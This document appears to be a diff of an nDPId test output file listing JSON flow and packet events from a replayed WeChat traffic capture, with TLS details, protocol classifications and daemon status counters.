+00901{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1484,"source":"wechat.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167866226,"flow_last_seen":1492167871323,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":208,"midstream":0,"thread_ts_msec":1492167871323,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58041,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +01436{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1486,"source":"wechat.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1492167866226,"flow_last_seen":1492167871323,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":3354,"flow_avg_l4_payload_len":335,"midstream":0,"thread_ts_msec":1492167871323,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58041,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} +00684{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1497,"source":"wechat.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"finished","flow_packets_processed":50,"flow_first_seen":1492167720101,"flow_last_seen":1492167748133,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2856,"flow_tot_l4_payload_len":27649,"flow_avg_l4_payload_len":552,"midstream":0,"thread_ts_msec":1492167872304,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54119,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} 
+00683{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1497,"source":"wechat.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1492167720353,"flow_last_seen":1492167748129,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":3531,"flow_avg_l4_payload_len":196,"midstream":0,"thread_ts_msec":1492167872304,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54120,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} +00683{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1513,"source":"wechat.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"finished","flow_packets_processed":26,"flow_first_seen":1492167765433,"flow_last_seen":1492167776953,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":9786,"flow_avg_l4_payload_len":376,"midstream":0,"thread_ts_msec":1492167897092,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58036,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1513,"source":"wechat.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167905310,"flow_last_seen":1492167905310,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167905310,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58042,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1513,"source":"wechat.pcap","alias":"nDPId-test","flow_id":74,"flow_packet_id":1,"flow_last_seen":1492167905310,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167905310,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8Y7pAAEAGtXnAqAFny82Tq+K6AbsLFrb3AAAAAKACchA4ZAAAAgQFtAQCCAoAMtVNAAAAAAEDAwc="} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1514,"source":"wechat.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167905561,"flow_last_seen":1492167905561,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167905561,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58043,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1514,"source":"wechat.pcap","alias":"nDPId-test","flow_id":75,"flow_packet_id":1,"flow_last_seen":1492167905561,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167905561,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8gtZAAEAGll3AqAFny82Tq+K7AbsB+ldaAAAAAKACchCg3QAAAgQFtAQCCAoAMtWMAAAAAAEDAwc="} 
00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1515,"source":"wechat.pcap","alias":"nDPId-test","flow_id":74,"flow_packet_id":2,"flow_last_seen":1492167905585,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167905585,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAAC8GKZTLzZOrwKgBZwG74rpcdpBKCxa2+KASN8jmJgAAAgQFoAQCCApFr1oYADLVTQEDAwc="} 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1516,"source":"wechat.pcap","alias":"nDPId-test","flow_id":74,"flow_packet_id":3,"flow_last_seen":1492167905585,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167905585,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0Y7tAAEAGtYDAqAFny82Tq+K6AbsLFrb4XHaQS4AQAOVLfQAAAQEICgAy1ZJFr1oY"} -00844{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1517,"source":"wechat.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167905310,"flow_last_seen":1492167905586,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167905586,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58042,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 
+00844{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1517,"source":"wechat.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167905310,"flow_last_seen":1492167905586,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167905586,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58042,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1518,"source":"wechat.pcap","alias":"nDPId-test","flow_id":75,"flow_packet_id":2,"flow_last_seen":1492167905858,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167905858,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAAC8GKZTLzZOrwKgBZwG74rtG\/8zAAfpXW6ASN8gnXAAAAgQFoAQCCApFr1pdADLVjAEDAwc="} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1519,"source":"wechat.pcap","alias":"nDPId-test","flow_id":75,"flow_packet_id":3,"flow_last_seen":1492167905858,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167905858,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0gtdAAEAGlmTAqAFny82Tq+K7AbsB+ldbRv\/MwYAQAOWMrQAAAQEICgAy1dZFr1pd"} 
-00901{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1521,"source":"wechat.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167905310,"flow_last_seen":1492167905866,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1492167905866,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58042,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} -01435{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1523,"source":"wechat.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167905310,"flow_last_seen":1492167905866,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":3354,"flow_avg_l4_payload_len":419,"midstream":0,"thread_ts_msec":1492167905866,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58042,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} +00901{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1521,"source":"wechat.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167905310,"flow_last_seen":1492167905866,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1492167905866,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58042,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} 
+01435{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1523,"source":"wechat.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167905310,"flow_last_seen":1492167905866,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":3354,"flow_avg_l4_payload_len":419,"midstream":0,"thread_ts_msec":1492167905866,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58042,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} 00660{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1550,"source":"wechat.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167765657,"flow_last_seen":1492167777220,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167911211,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58037,"dst_port":443,"l4_proto":"tcp","ndpi": 
{"confidence": {"2":"Match by IP"},"proto":"TLS.Tencent","breed":"Acceptable","category":"SocialNetwork"}} 00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1550,"source":"wechat.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167765657,"flow_last_seen":1492167777220,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167911211,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58037,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00568{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1553,"source":"wechat.pcap","alias":"nDPId-test","packets-captured":1553,"packets-processed":1552,"total-skipped-flows":0,"total-l4-payload-len":556502,"total-not-detected-flows":0,"total-guessed-flows":11,"total-detected-flows":60,"total-detection-updates":64,"total-updates":5,"current-active-flows":30,"total-active-flows":75,"total-idle-flows":45,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":465,"global_ts_msec":1492171154216} +00568{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1553,"source":"wechat.pcap","alias":"nDPId-test","packets-captured":1553,"packets-processed":1552,"total-skipped-flows":0,"total-l4-payload-len":556502,"total-not-detected-flows":0,"total-guessed-flows":11,"total-detected-flows":60,"total-detection-updates":62,"total-updates":5,"current-active-flows":30,"total-active-flows":75,"total-idle-flows":45,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":463,"global_ts_msec":1492171154216} 
00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1553,"source":"wechat.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171154216,"flow_last_seen":1492171154216,"flow_idle_time":7580000,"flow_min_l4_payload_len":1188,"flow_max_l4_payload_len":1188,"flow_tot_l4_payload_len":1188,"flow_avg_l4_payload_len":1188,"midstream":1,"thread_ts_msec":1492171154216,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54183,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 02086{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1553,"source":"wechat.pcap","alias":"nDPId-test","flow_id":76,"flow_packet_id":1,"flow_last_seen":1492171154216,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1254,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1254,"pkt_l4_len":1220,"thread_ts_msec":1492171154216,"pkt":"8IQvSpdgeJKcD6iOCABFAATYpoxAAEAGahTAqAFny82XotOnAbtQhl2xjWp\/PoAYBaSJeAAAAQEICgA\/OhBF4BL0FwMDBJ8AAAAAAAAAk06IK7tTPaQ0tnXGeqHKil75lMj6OyIERVlvQ89pkJ\/5uFrYubJHeJqSrynvitkot5qunWtMUvVbyI8vjd8zycM9IsUAAB\/fKHCxwAngzbmC6gdk\/UoKTL4MIPiK4NVVPRz1DsYhuoql6sqmFMKJKaM6NXpyBkCtYpvlazDCWxllWCP\/i12XdKQQMbcGYN2wvAB3a6vg6oJPIx+XXkk4cY\/+EENsi+PDerl+pB2IlJMObTfaJBhM\/rJFUKMd1xriphMBzgM9PCE+gKKP\/k+AYg8NddY\/gnJX\/+unfAflhC1NZ1nFt2\/\/Y9gesYC0uhG0uLLlbtLmKF2MPjllgxHAEeq6L2rXw2szIJL4yllp+t9tcKCYfzVRzCQkgUtQQaP0YiRh1NQtDTvnuPpM8CS6YfFOx17PkSNzepokWNsrLXMtr9p2nc9zczirZ\/D9H9Xey3Xx0qFAN\/MVzWUXfWpSlTWrXzNWP5kDdvTYBf19VGMPfxtzLKYTLOd\/rVswJ6OAUsAdfTYAu7j6c4KJubGecouom8T9brd1TJm6pyXignKkiQR+nvp0U\/G\/NxhEcnKV91SvFM0mQxh+hfK10svoh9dj1Bq8+PvXaAQljscptiwRlr+X\/V1zPyapTZcrW9A2fGrnzKqVYJASiCPQWyYD8Mn6pda0e6knRW3Ae28WpLnmyjMKx4\/7dOqugSoKa3q7BQRxbcpbcOXlPFfrjt+CwbA3KCTzFvdocE4QeSDn8FuJ85HFummmQOxK7tDtjljV+L\/2nbiMgjTy6jJzYFwXGw6xLdoXOupF5XjIfHUSMeB+R0BhUmtVxXEWPPHfAVdVJcBt8uO5QMhp9jxrSrOX54VXB+P7Qj0VmSag75Jhz20k8Z3uI27cFcp7Oj
dlKhlEBtlzESNSQ8FGkqCxygPJSf0REdvr2uQA0ApTgzzF+s6YbdeH3vy1SJOH2fQsH4IeYeRjAPrh1RmlhN066XBLLeGtIiz1LEJx17TCB8c1JpUan\/1+JYoV0SCzXlaZWYybCxcBBIz\/2EdpG8hJzN4rtTVwf\/3OYFkhRTMbe1PHW9T5IfuTuKU76wWlDp+aujzjWp1vvFdq4bUrI6AdEquAU5C3BTnuLB9tqzlOb5nzcQjb4fPQCkUUcvHBPPLW9qrLyB05aTRG1W9ShnsibG\/AerW39YgPMVulkynnwtbGsYcGZs7KelCQXCLt3D6RU08N5SulLgw+o5aYItue0wJaW5VDEXxAVhsE4KU4+QsEuXkbd9rTsMt9Gf+Td49H8NzJEXxlYX\/ThtsZsn5doQpcdUcGVMiJrwpHQzTDWZLiBcd51axsLca9fP61xaeKb48j0Kb0TeXy0DcAfEDH4Sy29YAuNi7N4uKdxMrzHsqaQhCFI\/jmx6CqCWjy1zA6Ijzjpx6KTEeNxn3m7OTzuxckZQeS0ArKR7BX7UnCFIAenlvKt7e\/DzO9W1DndidXP+Qwf3XzvB+qvenTl6HWA0XtGBky3MCwBE5b++HXnyFlygjOvbY7LPZovuQtASvUqwAHPkuONuar\/2ZEP2TwCB+AOJYrpZq+HLOc"} -00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1553,"source":"wechat.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171154216,"flow_last_seen":1492171154216,"flow_idle_time":7580000,"flow_min_l4_payload_len":1188,"flow_max_l4_payload_len":1188,"flow_tot_l4_payload_len":1188,"flow_avg_l4_payload_len":1188,"midstream":1,"thread_ts_msec":1492171154216,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54183,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1553,"source":"wechat.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171154216,"flow_last_seen":1492171154216,"flow_idle_time":7580000,"flow_min_l4_payload_len":1188,"flow_max_l4_payload_len":1188,"flow_tot_l4_payload_len":1188,"flow_avg_l4_payload_len":1188,"midstream":1,"thread_ts_msec":1492171154216,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54183,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 
00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1554,"source":"wechat.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171154792,"flow_last_seen":1492171154792,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492171154792,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"64.233.167.188","src_port":54205,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1554,"source":"wechat.pcap","alias":"nDPId-test","flow_id":77,"flow_packet_id":1,"flow_last_seen":1492171154792,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492171154792,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0MxpAAEAGXPXAqAFnQOmnvNO9AbuA1BLzAh8CfoAQAT0MFQAAAQEICgA\/OqCGKY\/Q"} -00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1555,"source":"wechat.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1492167795095,"flow_last_seen":1492167795102,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1492171154792,"l3_proto":"ip6","src_ip":"fe80::91f9:3df3:7436:6cd6","dst_ip":"ff02::1:3","src_port":50577,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 
-00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1555,"source":"wechat.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":40,"flow_first_seen":1492167338426,"flow_last_seen":1492167781907,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":1600,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1492171154792,"l3_proto":"ip6","src_ip":"fe80::7a92:9cff:fe0f:a88e","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"}} -00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1555,"source":"wechat.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1492167851002,"flow_last_seen":1492167851002,"flow_idle_time":200000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1492171154792,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"}} -00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1555,"source":"wechat.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1492167795088,"flow_last_seen":1492167795100,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1492171154792,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"224.0.0.252","src_port":49832,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} -00641{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1555,"source":"wechat.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1492167449288,"flow_last_seen":1492167820408,"flow_idle_time":620000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1492171154792,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"224.0.0.22","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} 